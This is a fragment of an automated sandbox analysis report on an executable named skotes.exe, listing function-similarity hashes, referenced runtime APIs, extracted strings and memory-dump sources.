                                                                                                                                                                • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 218105897-0
                                                                                                                                                                • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                • Instruction ID: 8230041dd9b7ce2006bf6c34018fdfd8a42b5e60b68a5f6889d2d3db3e04c869
                                                                                                                                                                • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                • Instruction Fuzzy Hash: D7F0A730A04B105FEA62AB588852F7B23D5DF46711F00C4ADE41B97682CE64E842CB40
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00BBDFE8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                • API String ID: 0-2895844383
                                                                                                                                                                • Opcode ID: 68da14b6d545a3e85021f9a053467e70c7fdb0edb7f95b5891431ca71dd056c4
                                                                                                                                                                • Instruction ID: ad17d99d259fbed2a884d5cc1b98721dc11df7bddc40f9a09e6ae037ebb6b2ec
                                                                                                                                                                • Opcode Fuzzy Hash: 68da14b6d545a3e85021f9a053467e70c7fdb0edb7f95b5891431ca71dd056c4
                                                                                                                                                                • Instruction Fuzzy Hash: 1C219D71604209AFAB30BE659C82EFB77EDEF5036475046A4F93997161EBF0EC0087A0
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00BB1764
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BB17AF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pContext
                                                                                                                                                                • API String ID: 3390424672-2046700901
                                                                                                                                                                • Opcode ID: 3677093f0c4789841895afcc700789c63c85280ac9c163b282b92be8042840b9
                                                                                                                                                                • Instruction ID: 40bacede4388ac8a33406d4b6c3ad551544ab0299b708b74f4f28cdad43624d6
                                                                                                                                                                • Opcode Fuzzy Hash: 3677093f0c4789841895afcc700789c63c85280ac9c163b282b92be8042840b9
                                                                                                                                                                • Instruction Fuzzy Hash: 99110639A112149BCB15BF1DC4A49BD77E5EF84360B4448E5E812AB352DFB0ED01CBD0
                                                                                                                                                                APIs
                                                                                                                                                                • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00BAB94E
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BAB961
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pContext
                                                                                                                                                                • API String ID: 548886458-2046700901
                                                                                                                                                                • Opcode ID: 6ec741c77636b0c7e2fc0daf93e57df2920d1ec4e78f705c36ff159a27ecc86e
                                                                                                                                                                • Instruction ID: 4c99820ca805b6e492be5c50c7e87261495da1439d13bc6bc3c678281e64705f
                                                                                                                                                                • Opcode Fuzzy Hash: 6ec741c77636b0c7e2fc0daf93e57df2920d1ec4e78f705c36ff159a27ecc86e
                                                                                                                                                                • Instruction Fuzzy Hash: BCE09B39B401046BCB14B768E859C9DFBF99E847147044196E511A7351EB709905C5D0
                                                                                                                                                                APIs
                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BA34FC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pScheduler$version
                                                                                                                                                                • API String ID: 2141394445-3154422776
                                                                                                                                                                • Opcode ID: 2216a9404d7876db49800ded1f27a9b73cf89b82756218e64d9a393c16851154
                                                                                                                                                                • Instruction ID: 87f3175a79645218d47b3343429afae225b23ae43fc44a1ed3e2bc8e333f1133
                                                                                                                                                                • Opcode Fuzzy Hash: 2216a9404d7876db49800ded1f27a9b73cf89b82756218e64d9a393c16851154
                                                                                                                                                                • Instruction Fuzzy Hash: F3E08634544208B7CF25FA54D847ADCBBE4DB15F49F14C1E2B811212A1AFF5978CDA81
